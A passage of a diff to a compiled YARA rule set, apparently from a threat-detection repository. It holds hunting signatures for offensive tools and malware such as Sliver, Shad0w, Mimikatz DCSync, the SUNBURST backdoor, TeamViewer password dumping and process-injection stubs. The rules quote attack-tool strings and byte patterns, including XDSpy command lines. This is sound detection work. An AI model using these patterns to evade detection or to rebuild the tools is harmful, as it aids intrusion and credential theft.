- author = "SBousseaden" - id = "eba5043a-ca4d-5c5d-a895-51218b03e59e" - date = "2020-10-11" - modified = "2020-10-11" - reference = "https://github.com/BishopFox/sliver" - source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_sliver_go_framwwork.yara#L2-L9" - license_url = "N/A" - logic_hash = "8dc96e533adc29c78a998d9f064ff294d2ef8a4ff00cef8b0c81ef465ef70b08" - score = 75 - quality = 75 - tags = "" - - strings: - $go = "_cgo_" - - condition: - #go>10 and pe.exports("RunSliver") -} rule SBOUSSEADEN_Mem_Webcreds_Regexp_Xor { meta: @@ -212357,94 +214300,146 @@ rule SBOUSSEADEN_Hunt_Teamviewer_Registry_Pwddump : CVE_2019_18988 FILE condition: any of ($key*) and any of ($iv*) and 2 of ($p*) and filesize <700KB } -rule SBOUSSEADEN_APT_Solarwind_Backdoor_Encoded_Strings : FILE +rule SBOUSSEADEN_Shad0W_Beacon_16June : FILE { meta: - description = "This rule is looking for some key encoded strings of the SUNBURST backdoor" + description = "Shad0w beacon compressed" author = "SBousseaden" - id = "04a63bd6-9737-568f-a20e-c573b915cbd4" - date = "2020-12-14" - modified = "2020-12-18" - reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" - source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/apt_solarwinds_backdoor_encoded_strings.yara#L1-L28" + id = "1229e84f-bf6e-5e87-9351-a48cd50397b0" + date = "2020-06-16" + modified = "2020-06-17" + reference = "https://github.com/bats3c/shad0w" + source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w_beacon_16June.yara#L1-L13" license_url = "N/A" - hash = "846e27a652a5e1bfbd0ddd38a16dc865" - logic_hash = "8808cca8d89f089a8bca5ef62c1764061c8210ba5f9813c886d6ed9f79579ba6" + logic_hash = "c313e995d6eaae6d2ee63964f6fc94964065af7a61d7f304280d914e6f0dd548" score = 75 quality = 75 tags = "FILE" - sha2 = "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6" strings: - $sw = "SolarWinds" - $priv1 = "C04NScxO9S/PSy0qzsgsCCjKLMvMSU1PBQA=" wide - $priv2 = "C04NzigtSckvzwsoyizLzElNTwUA" wide - $priv3 = "C04NSi0uyS9KDSjKLMvMSU1PBQA=" wide - $disc1 = "C0gsSs0rCSjKT04tLvZ0AQA=" wide - $disc2 = "c0zJzczLLC4pSizJLwIA" wide - $disc3 = "c/ELdsnPTczMCy5NS8usCE5NLErO8C9KSS0CAA==" wide - $wmi1 = "C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA==" wide - $wmi2 = "C07NSU0uUdBScCvKz1UIz8wzNooPKMpPTi0uBgA=" wide - $wmi3 = "C07NSU0uUdBScCvKz1UIz8wzNooPLU4tckxOzi/NKwEA" wide - $wmi4 = "C07NSU0uUdBScCvKz1UIz8wzNor3Sy0pzy/KdkxJLChJLXLOz0vLTC8tSizJzM9TKM9ILUpV8AxwzUtMyklNsS0pKk0FAA==" - $key1 = "C44MDnH1jXEuLSpKzStxzs8rKcrPCU4tiSlOLSrLTE4tBgA=" wide - $key2 = "Cy5JLCoBAA==" wide - $pat1 = "i6420DGtjVWoNqzlAgA=" wide - $pat2 = "i6420DGtjVWoNtTRNTSrVag2quWsNgYKKVSb1MZUm9ZyAQA=" wide - $pat3 = "qzaoVag2rFXwCAkJ0K82quUCAA==" wide - $pat4 = {9D 2A 9A F3 27 D6 F8 EF} + $s1 = {F2 AE ?? ?? ?? FF 15 ?? ?? 00 00 48 09 C0 74 09} + $s2 = {33 2E 39 36 00 ?? ?? ?? 21 0D 24 0E 0A} + $s3 = "VirtualProtect" + $s4 = "GetProcAddress" condition: - uint16(0)==0x5a4d and $sw and (2 of ($pat*) or 2 of ($priv*) or all of ($disc*) or 2 of ($wmi*) or all of ($key*)) + uint16(0)==0x5a4d and all of ($s*) } import "pe" -rule SBOUSSEADEN_Shad0W_Beacon : FILE +rule SBOUSSEADEN_Susp_Winsvc_Upx : FILE { meta: - description = "Shad0w beacon default suspicous strings" + description = "broad hunt for any PE exporting ServiceMain API and upx packed" author = "SBousseaden" - id = "e725172d-dd07-5027-ac85-86d366881856" - date = "2020-06-04" + id = "883691fe-3858-5177-97ca-122ff2ec54af" + date = "2019-01-28" modified = "2020-06-05" - reference = "https://github.com/bats3c/shad0w" - source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w.yara#L3-L15" + reference = "https://github.com/sbousseaden/YaraHunts/" + source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/susp_winsvc_upx.yara#L3-L13" license_url = "N/A" - logic_hash = "9ea7cf72da0d93f607f58b61cc0fb5f3f114d4454101c69b08c59e6b61353550" - score = 75 - quality = 73 + logic_hash = "85b1932eaab4e559f0805aa76ad9b58553708391b3ac894a8e4f1cf34470dcb7" + score = 65 + quality = 75 tags = "FILE" strings: - $s1 = "LdrLoadD" - $s2 = {53 65 74 50 72 2A 65 73 73 4D} - $s3 = "Policy" + $upx1 = {55505830000000} + $upx2 = {55505831000000} + $upx_sig = "UPX!" condition: - uint16(0)==0x5a4d and all of ($s*) and pe.sections[0].name=="XPU0" and pe.imports("winhttp.dll","WinHttpOpen") + uint16(0)==0x5a4d and $upx1 in (0..1024) and $upx2 in (0..1024) and $upx_sig in (0..1024) and pe.exports("ServiceMain") } -rule SBOUSSEADEN_TDL_Loader_Bootstrap_Shellcode : FILE +rule SBOUSSEADEN_Dcsync_Mimikatz : FILE { meta: - description = "No description has been set in the source file - SBousseaden" + description = "Hunting rule for Mimikatz Implementation of DCSync Attack" author = "SBousseaden" - id = "a2adedef-ba38-599f-b52c-e2156aa5ef98" - date = "2020-10-10" - modified = "2020-10-10" - reference = "https://github.com/hfiref0x/TDL" - source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/tdl_loader_bootstrat_shellcode.yara#L1-L9" + id = "2d5d5fdb-8a84-5e88-b136-4e3e788c46cd" + date = "2020-09-22" + modified = "2020-09-22" + reference = "https://github.com/gentilkiwi/mimikatz" + source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_mimikatz_dcsync.yara#L1-L24" license_url = "N/A" - logic_hash = "14a993b415e330e284503c409ab66445c5e369a21ef0be37297d9c8946b5559b" - score = 75 + logic_hash = "436979d794b7b599f2186252c7f233f091100880c2d39008d8bd7f839553fb53" + score = 50 quality = 75 tags = "FILE" strings: - $shc1 = {41 B8 54 64 6C 53 48 63 6B 3C 48 03 EB 44 8B 7D 50 41 8D 97 00 10 00 00 41 FF D1} - $shc2 = {41 B8 54 64 6C 53 4C 63 73 3C 4C 03 F3 45 8B 7E 50 41 8D 97 00 10 00 00 41 FF D1 45 33 C9} + $DRS1 = "DRSGetNCChanges" + $DRS2 = "DRSReplicaAdd" + $DRS3 = "DRSAddEntry" + $DRSW1 = "DRSGetNCChanges" wide + $DRSW2 = "DRSReplicaAdd" wide + $DRSW3 = "DRSAddEntry" wide + $rpc1 = {35 42 51 E3 06 4B D1 11 AB 04 00 C0 4F C2 DC D2 04 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02} + $rpc2 = {34 05 50 21 18 00 08 00 13 81 20 00 8A 05 70 00 28} + $rpc3 = {0B 01 10 00 DC 05 50 21 18 00 08 00 13 21 20 00 2E 06 70 00 28} + $rpc4 = {48 06 50 21 18 00 08 00 13 41 20 00 72 06 70 00 28} + $rpc5 = {78 03 0B 00 10 00 7C 03 13 20 18 00 A4 03 10 01 20 00 AC 03 70 00 28} + $rpc6 = {C0 03 50 21 18 00 08 00 13 01 20 00 74 04 70 00 28} + $rpc7 = {8C 06 50 21 18 00 08 00 13 A1 20 00 C6 06 70 00 28} + $def1 = "mimikatz" + $def2 = "mimikatz" wide condition: - uint16(0)==0x5a4d and any of ($shc*) + uint16(0)==0x5a4d and ( all of ($DRS*) or all of ($DRSW*)) and all of ($rpc*) and not ( any of ($def*)) +} +import "pe" + +rule SBOUSSEADEN_Hunt_Dllhijack_Wow64Log : FILE +{ + meta: + description = "broad hunt for non MS wow64log module" + author = "SBousseaden" + id = "1d01917f-0690-5ede-947a-90fc86c03c38" + date = "2020-06-05" + modified = "2020-06-05" + reference = "http://waleedassar.blogspot.com/2013/01/wow64logdll.html" + source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/wow64log.yara#L3-L13" + license_url = "N/A" + logic_hash = "e8ec491fe579b7e57b7e9078515a9628cfc2e0f3645882b9a352ff28a2fcb817" + score = 50 + quality = 75 + tags = "FILE" + + condition: + uint16(0)==0x5a4d and (pe.exports("Wow64LogInitialize") or pe.exports("Wow64LogMessageArgList") or pe.exports("Wow64LogSystemService") or pe.exports("Wow64LogTerminate")) +} +rule SBOUSSEADEN_Hunt_Procinj_Instrumentationcallback : FILE +{ + meta: + description = "hunt for possible injection with Instrumentation Callback PE" + author = "SBousseaden" + id = "f450bf71-d848-540e-b700-c046662f1cbc" + date = "2020-07-25" + modified = "2020-07-25" + reference = "https://movaxbx.ru/2020/07/24/weaponizing-mapping-injection-with-instrumentation-callback-for-stealthier-process-injection/" + source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_procinj_instrcallback.yara#L1-L21" + license_url = "N/A" + logic_hash = "b33dae550bae9508b9fd5b2d6cabf1d4d928792d3988af23cdba34d9d3d03162" + score = 50 + quality = 71 + tags = "FILE" + + strings: + $mv1 = "MapViewOfFile3" xor + $mv2 = "MapViewOfFile3" wide xor + $mv3 = "NtMapViewOfSectionEx" xor + $mv4 = "NtMapViewOfSectionEx" wide xor + $mv5 = {(49 89 CA|4C 8B D1) B8 0F 01 00 00 0F 05 C3} + $spi1 = "NtSetInformationProcess" xor + $spi2 = "NtSetInformationProcess" wide xor + $spi3 = {(49 89 CA|4C 8B D1) B8 1C 00 00 00 0F 05 C3} + $picb = {BA 28 00 00 00} + $ss1 = {41 52 50 53 55 57 56 54 41 54 41 55 41 56 41 57} + $ss2 = {41 5F 41 5E 41 5D 41 5C 5C 5E 5F 5D 5B 58 41 5A} + $ss3 = {49 89 CA 0F 05 C3} + + condition: + uint16(0)==0x5a4d and $picb and 1 of ($mv*) and 1 of ($spi*) and 1 of ($ss*) } rule SBOUSSEADEN_Cve_2019_1458 : FILE { @@ -212482,6 +214477,29 @@ rule SBOUSSEADEN_Cve_2019_1458 : FILE condition: uint16(0)==0x5a4d and all of them } +rule SBOUSSEADEN_Hunt_Evtmutehook_Memory +{ + meta: + description = "memory hunt for default wevtsv EtwEventCallback hook pattern to apply to eventlog svchost memory dump" + author = "SBousseaden" + id = "5326581e-90d9-59b9-8dc5-74df97571600" + date = "2020-09-05" + modified = "2020-09-05" + reference = "https://blog.dylan.codes/pwning-windows-event-logging/" + source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_memory_evtmutehook.yara#L1-L11" + license_url = "N/A" + logic_hash = "3db66069ed67d90031a6fe071dad4d0200ddd661b263dd2860df026673031e48" + score = 50 + quality = 75 + tags = "" + + strings: + $a = {49 BB ?? ?? ?? ?? ?? ?? ?? ?? 41 FF E3 54 24 20 4C 8B 05 61 CB 1A 00 0F 57 C0 66 0F 7F 44 24 20 E8 5B 0A 00 00 48 83 C4 38 C3} + $b = {48 83 EC 38 4C 8B 0D 65 CB 1A 00 48 8D 54 24 20 4C 8B 05 61 CB 1A 00 0F 57 C0 66 0F 7F 44 24 20 E8 5B 0A 00 00 48 83 C4 38 C3} + + condition: + $a and not $b +} rule SBOUSSEADEN_Hunt_Slub_Backdoor : FILE { meta: @@ -212517,53 +214535,29 @@ rule SBOUSSEADEN_Hunt_Slub_Backdoor : FILE condition: uint16(0)==0x5a4d and 3 of them } -rule SBOUSSEADEN_Hunt_Evtmutehook_Memory -{ - meta: - description = "memory hunt for default wevtsv EtwEventCallback hook pattern to apply to eventlog svchost memory dump" - author = "SBousseaden" - id = "5326581e-90d9-59b9-8dc5-74df97571600" - date = "2020-09-05" - modified = "2020-09-05" - reference = "https://blog.dylan.codes/pwning-windows-event-logging/" - source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_memory_evtmutehook.yara#L1-L11" - license_url = "N/A" - logic_hash = "3db66069ed67d90031a6fe071dad4d0200ddd661b263dd2860df026673031e48" - score = 50 - quality = 75 - tags = "" - - strings: - $a = {49 BB ?? ?? ?? ?? ?? ?? ?? ?? 41 FF E3 54 24 20 4C 8B 05 61 CB 1A 00 0F 57 C0 66 0F 7F 44 24 20 E8 5B 0A 00 00 48 83 C4 38 C3} - $b = {48 83 EC 38 4C 8B 0D 65 CB 1A 00 48 8D 54 24 20 4C 8B 05 61 CB 1A 00 0F 57 C0 66 0F 7F 44 24 20 E8 5B 0A 00 00 48 83 C4 38 C3} - - condition: - $a and not $b -} -rule SBOUSSEADEN_Shad0W_Beacon_16June : FILE +rule SBOUSSEADEN_APT_Xdsspy_Xdupload : FILE { meta: - description = "Shad0w beacon compressed" + description = "No description has been set in the source file - SBousseaden" author = "SBousseaden" - id = "1229e84f-bf6e-5e87-9351-a48cd50397b0" - date = "2020-06-16" - modified = "2020-06-17" - reference = "https://github.com/bats3c/shad0w" - source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w_beacon_16June.yara#L1-L13" + id = "ae38d017-6420-596c-af29-62f15cfe56b8" + date = "2020-05-10" + modified = "2020-10-05" + reference = "https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/" + source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/apt_xdspy_xdupload.yara#L1-L11" license_url = "N/A" - logic_hash = "c313e995d6eaae6d2ee63964f6fc94964065af7a61d7f304280d914e6f0dd548" + logic_hash = "648ea81d1b44d8514439683cf2f86a8027f9e1eb64abf76d42347fc2ce9c4e68" score = 75 quality = 75 tags = "FILE" strings: - $s1 = {F2 AE ?? ?? ?? FF 15 ?? ?? 00 00 48 09 C0 74 09} - $s2 = {33 2E 39 36 00 ?? ?? ?? 21 0D 24 0E 0A} - $s3 = "VirtualProtect" - $s4 = "GetProcAddress" + $s1 = "cmd.exe /u /c cd /d \"%s\" & dir /a /-c" wide + $s2 = "commandC_dll.dll" + $s3 = "cmd.exe /u /c del" wide condition: - uint16(0)==0x5a4d and all of ($s*) + uint16(0)==0x5a4d and 2 of ($s*) } rule SBOUSSEADEN_Shad0W_Ldrloaddll_Hook : FILE { @@ -212590,100 +214584,70 @@ rule SBOUSSEADEN_Shad0W_Ldrloaddll_Hook : FILE condition: uint16(0)==0x5a4d and all of ($s*) } -rule SBOUSSEADEN_Dcsync_Mimikatz : FILE -{ - meta: - description = "Hunting rule for Mimikatz Implementation of DCSync Attack" - author = "SBousseaden" - id = "2d5d5fdb-8a84-5e88-b136-4e3e788c46cd" - date = "2020-09-22" - modified = "2020-09-22" - reference = "https://github.com/gentilkiwi/mimikatz" - source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_mimikatz_dcsync.yara#L1-L24" - license_url = "N/A" - logic_hash = "436979d794b7b599f2186252c7f233f091100880c2d39008d8bd7f839553fb53" - score = 50 - quality = 75 - tags = "FILE" - - strings: - $DRS1 = "DRSGetNCChanges" - $DRS2 = "DRSReplicaAdd" - $DRS3 = "DRSAddEntry" - $DRSW1 = "DRSGetNCChanges" wide - $DRSW2 = "DRSReplicaAdd" wide - $DRSW3 = "DRSAddEntry" wide - $rpc1 = {35 42 51 E3 06 4B D1 11 AB 04 00 C0 4F C2 DC D2 04 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02} - $rpc2 = {34 05 50 21 18 00 08 00 13 81 20 00 8A 05 70 00 28} - $rpc3 = {0B 01 10 00 DC 05 50 21 18 00 08 00 13 21 20 00 2E 06 70 00 28} - $rpc4 = {48 06 50 21 18 00 08 00 13 41 20 00 72 06 70 00 28} - $rpc5 = {78 03 0B 00 10 00 7C 03 13 20 18 00 A4 03 10 01 20 00 AC 03 70 00 28} - $rpc6 = {C0 03 50 21 18 00 08 00 13 01 20 00 74 04 70 00 28} - $rpc7 = {8C 06 50 21 18 00 08 00 13 A1 20 00 C6 06 70 00 28} - $def1 = "mimikatz" - $def2 = "mimikatz" wide - - condition: - uint16(0)==0x5a4d and ( all of ($DRS*) or all of ($DRSW*)) and all of ($rpc*) and not ( any of ($def*)) -} -rule SBOUSSEADEN_Hunt_Procinj_Instrumentationcallback : FILE +rule SBOUSSEADEN_Infinityhook : FILE { meta: - description = "hunt for possible injection with Instrumentation Callback PE" + description = "Infinityhook is a legit research PoC to hook NT Syscalls bypassing PatchGuard" author = "SBousseaden" - id = "f450bf71-d848-540e-b700-c046662f1cbc" - date = "2020-07-25" - modified = "2020-07-25" - reference = "https://movaxbx.ru/2020/07/24/weaponizing-mapping-injection-with-instrumentation-callback-for-stealthier-process-injection/" - source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_procinj_instrcallback.yara#L1-L21" + id = "82f4eef2-fca7-58b1-a85c-3c237f523740" + date = "2020-09-07" + modified = "2020-07-10" + reference = "https://github.com/everdox/InfinityHook" + source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/infinityhook.yara#L1-L17" license_url = "N/A" - logic_hash = "b33dae550bae9508b9fd5b2d6cabf1d4d928792d3988af23cdba34d9d3d03162" - score = 50 - quality = 71 + logic_hash = "c621ce3be8049de7584af73ca4472df5561d3c4ac8b458937db2ad68fdcbe2d8" + score = 75 + quality = 73 tags = "FILE" strings: - $mv1 = "MapViewOfFile3" xor - $mv2 = "MapViewOfFile3" wide xor - $mv3 = "NtMapViewOfSectionEx" xor - $mv4 = "NtMapViewOfSectionEx" wide xor - $mv5 = {(49 89 CA|4C 8B D1) B8 0F 01 00 00 0F 05 C3} - $spi1 = "NtSetInformationProcess" xor - $spi2 = "NtSetInformationProcess" wide xor - $spi3 = {(49 89 CA|4C 8B D1) B8 1C 00 00 00 0F 05 C3} - $picb = {BA 28 00 00 00} - $ss1 = {41 52 50 53 55 57 56 54 41 54 41 55 41 56 41 57} - $ss2 = {41 5F 41 5E 41 5D 41 5C 5C 5E 5F 5D 5B 58 41 5A} - $ss3 = {49 89 CA 0F 05 C3} + $EtwpDebuggerPattern = {00 2C 08 04 38 0C 00} + $SMV = {00 00 76 66 81 3A 02 18 50 00 75 0E 48 83 EA 08 B8 33 0F 00} + $KVASCODE = {4B 56 41 53 43 4F 44 45} + $CKL = "Circular Kernel Context Logger" wide nocase condition: - uint16(0)==0x5a4d and $picb and 1 of ($mv*) and 1 of ($spi*) and 1 of ($ss*) + uint16(0)==0x5a4d and all of them } -import "pe" - -rule SBOUSSEADEN_Susp_Winsvc_Upx : FILE +rule SBOUSSEADEN_APT_Solarwind_Backdoor_Encoded_Strings : FILE { meta: - description = "broad hunt for any PE exporting ServiceMain API and upx packed" + description = "This rule is looking for some key encoded strings of the SUNBURST backdoor" author = "SBousseaden" - id = "883691fe-3858-5177-97ca-122ff2ec54af" - date = "2019-01-28" - modified = "2020-06-05" - reference = "https://github.com/sbousseaden/YaraHunts/" - source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/susp_winsvc_upx.yara#L3-L13" + id = "04a63bd6-9737-568f-a20e-c573b915cbd4" + date = "2020-12-14" + modified = "2020-12-18" + reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/apt_solarwinds_backdoor_encoded_strings.yara#L1-L28" license_url = "N/A" - logic_hash = "85b1932eaab4e559f0805aa76ad9b58553708391b3ac894a8e4f1cf34470dcb7" - score = 65 + hash = "846e27a652a5e1bfbd0ddd38a16dc865" + logic_hash = "8808cca8d89f089a8bca5ef62c1764061c8210ba5f9813c886d6ed9f79579ba6" + score = 75 quality = 75 tags = "FILE" + sha2 = "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6" strings: - $upx1 = {55505830000000} - $upx2 = {55505831000000} - $upx_sig = "UPX!" + $sw = "SolarWinds" + $priv1 = "C04NScxO9S/PSy0qzsgsCCjKLMvMSU1PBQA=" wide + $priv2 = "C04NzigtSckvzwsoyizLzElNTwUA" wide + $priv3 = "C04NSi0uyS9KDSjKLMvMSU1PBQA=" wide + $disc1 = "C0gsSs0rCSjKT04tLvZ0AQA=" wide + $disc2 = "c0zJzczLLC4pSizJLwIA" wide + $disc3 = "c/ELdsnPTczMCy5NS8usCE5NLErO8C9KSS0CAA==" wide + $wmi1 = "C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA==" wide + $wmi2 = "C07NSU0uUdBScCvKz1UIz8wzNooPKMpPTi0uBgA=" wide + $wmi3 = "C07NSU0uUdBScCvKz1UIz8wzNooPLU4tckxOzi/NKwEA" wide + $wmi4 = "C07NSU0uUdBScCvKz1UIz8wzNor3Sy0pzy/KdkxJLChJLXLOz0vLTC8tSizJzM9TKM9ILUpV8AxwzUtMyklNsS0pKk0FAA==" + $key1 = "C44MDnH1jXEuLSpKzStxzs8rKcrPCU4tiSlOLSrLTE4tBgA=" wide + $key2 = "Cy5JLCoBAA==" wide + $pat1 = "i6420DGtjVWoNqzlAgA=" wide + $pat2 = "i6420DGtjVWoNtTRNTSrVag2quWsNgYKKVSb1MZUm9ZyAQA=" wide + $pat3 = "qzaoVag2rFXwCAkJ0K82quUCAA==" wide + $pat4 = {9D 2A 9A F3 27 D6 F8 EF} condition: - uint16(0)==0x5a4d and $upx1 in (0..1024) and $upx2 in (0..1024) and $upx_sig in (0..1024) and pe.exports("ServiceMain") + uint16(0)==0x5a4d and $sw and (2 of ($pat*) or 2 of ($priv*) or all of ($disc*) or 2 of ($wmi*) or all of ($key*)) } rule SBOUSSEADEN_Mimikatz_Kiwikey { @@ -212710,74 +214674,51 @@ rule SBOUSSEADEN_Mimikatz_Kiwikey } import "pe" -rule SBOUSSEADEN_Hunt_Dllhijack_Wow64Log : FILE +rule SBOUSSEADEN_Maliciousdllgenerator : FILE { meta: - description = "broad hunt for non MS wow64log module" + description = "MaliciousDLLGenerator default decoder and export name" author = "SBousseaden" - id = "1d01917f-0690-5ede-947a-90fc86c03c38" - date = "2020-06-05" - modified = "2020-06-05" - reference = "http://waleedassar.blogspot.com/2013/01/wow64logdll.html" - source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/wow64log.yara#L3-L13" + id = "a5f4d0b2-ef40-5e69-935e-208464944487" + date = "2020-06-07" + modified = "2020-06-08" + reference = "https://github.com/Mr-Un1k0d3r/MaliciousDLLGenerator" + source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/MaliciousDLLGenerator.yara#L3-L12" license_url = "N/A" - logic_hash = "e8ec491fe579b7e57b7e9078515a9628cfc2e0f3645882b9a352ff28a2fcb817" - score = 50 + logic_hash = "70976f4a7043f52277a1d436c1725b2583383880d7158c74c4d93f3e603708c7" + score = 75 quality = 75 tags = "FILE" - condition: - uint16(0)==0x5a4d and (pe.exports("Wow64LogInitialize") or pe.exports("Wow64LogMessageArgList") or pe.exports("Wow64LogSystemService") or pe.exports("Wow64LogTerminate")) -} -rule SBOUSSEADEN_Hunt_Susp_Vhd : FILE -{ - meta: - description = "Virtual hard disk file with embedded PE" - author = "SBousseaden" - id = "14b082b2-c5cd-5f34-85e9-5987650eaacd" - date = "2020-07-13" - modified = "2020-07-13" - reference = "https://github.com/sbousseaden/YaraHunts/" - source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_susp_vhd.yara#L1-L12" - license_url = "N/A" - logic_hash = "4ba2e3f533942b27c1d235be4677afdac774b558429c414043a8e3a609123ad3" - score = 65 - quality = 73 - tags = "FILE" - strings: - $hvhd = {636F6E6563746978} - $s1 = {4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00} - $s2 = "!This program cannot be run in DOS mode." base64 - $s3 = "!This program cannot be run in DOS mode." xor + $decoder = {E8 00 00 00 00 5B 48 31 C0 48 89 C1 B1 80 48 83 C3 11 48 F7 14 CB E2 FA 48 83 C3 08 53 C3} condition: - $hvhd at 0 and any of ($s*) and filesize <=10MB + uint16(0)==0x5a4d and $decoder and pe.exports("Init") and pe.number_of_exports==2 } -rule SBOUSSEADEN_Infinityhook : FILE +import "pe" + +rule SBOUSSEADEN_Gosliver { meta: - description = "Infinityhook is a legit research PoC to hook NT Syscalls bypassing PatchGuard" + description = "No description has been set in the source file - SBousseaden" author = "SBousseaden" - id = "82f4eef2-fca7-58b1-a85c-3c237f523740" - date = "2020-09-07" - modified = "2020-07-10" - reference = "https://github.com/everdox/InfinityHook" - source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/infinityhook.yara#L1-L17" + id = "eba5043a-ca4d-5c5d-a895-51218b03e59e" + date = "2020-10-11" + modified = "2020-10-11" + reference = "https://github.com/BishopFox/sliver" + source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_sliver_go_framwwork.yara#L2-L9" license_url = "N/A" - logic_hash = "c621ce3be8049de7584af73ca4472df5561d3c4ac8b458937db2ad68fdcbe2d8" + logic_hash = "8dc96e533adc29c78a998d9f064ff294d2ef8a4ff00cef8b0c81ef465ef70b08" score = 75 - quality = 73 - tags = "FILE" + quality = 75 + tags = "" strings: - $EtwpDebuggerPattern = {00 2C 08 04 38 0C 00} - $SMV = {00 00 76 66 81 3A 02 18 50 00 75 0E 48 83 EA 08 B8 33 0F 00} - $KVASCODE = {4B 56 41 53 43 4F 44 45} - $CKL = "Circular Kernel Context Logger" wide nocase + $go = "_cgo_" condition: - uint16(0)==0x5a4d and all of them + #go>10 and pe.exports("RunSliver") } import "pe" @@ -212820,35 +214761,11 @@ rule SBOUSSEADEN_Susp_Msoffice_Addins_Wxll : FILE condition: uint16(0)==0x5a4d and (pe.exports("wdAutoOpen") or pe.exports("xlAutoOpen")) and 3 of ($inj*) } -import "pe" - -rule SBOUSSEADEN_Maliciousdllgenerator : FILE -{ - meta: - description = "MaliciousDLLGenerator default decoder and export name" - author = "SBousseaden" - id = "a5f4d0b2-ef40-5e69-935e-208464944487" - date = "2020-06-07" - modified = "2020-06-08" - reference = "https://github.com/Mr-Un1k0d3r/MaliciousDLLGenerator" - source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/MaliciousDLLGenerator.yara#L3-L12" - license_url = "N/A" - logic_hash = "70976f4a7043f52277a1d436c1725b2583383880d7158c74c4d93f3e603708c7" - score = 75 - quality = 75 - tags = "FILE" - - strings: - $decoder = {E8 00 00 00 00 5B 48 31 C0 48 89 C1 B1 80 48 83 C3 11 48 F7 14 CB E2 FA 48 83 C3 08 53 C3} - - condition: - uint16(0)==0x5a4d and $decoder and pe.exports("Init") and pe.number_of_exports==2 -} /* * YARA Rule Set * Repository Name: Elceef * Repository: https://github.com/elceef/yara-rulz - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: 05834717d1464d5efce8ad9d688ff7b53886a0bb * Number of Rules: 17 * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance) @@ -212879,6 +214796,244 @@ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ +rule ELCEEF_ZIP_High_Ratio_Single_Doc : FILE +{ + meta: + description = "Detects ZIP archives containing single MS Word document with unusually high compression ratio" + author = "marcin@ulikowski.pl" + id = "0fbe89d9-1bf5-50a9-b6c1-1d739162a2ba" + date = "2023-03-08" + modified = "2023-03-08" + reference = "https://github.com/elceef/yara-rulz" + source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/ZIP_High_Ratio_Single_Doc.yara#L8-L27" + license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE" + logic_hash = "470300b8d6356cff43a1e2be3a23a97be5d1e2ce5a76f2fb2eccdbbb47a4d327" + score = 75 + quality = 75 + tags = "FILE" + hash1 = "4d9a6dfca804989d40eeca9bb2d90ef33f3980eb07ca89bbba06d0ef4b37634b" + hash2 = "4bc2d14585c197ad3aa5836b3f7d9d784d7afe79856e0ddf850fc3c676b6ecb1" + + strings: + $magic = { 50 4b 03 04 } + $ext = ".doc" + + condition: + filesize <1MB and $magic at 0 and #magic==1 and uint32(22)>1024*1024*100 and $ext at ( uint16(26)+26) +} +rule 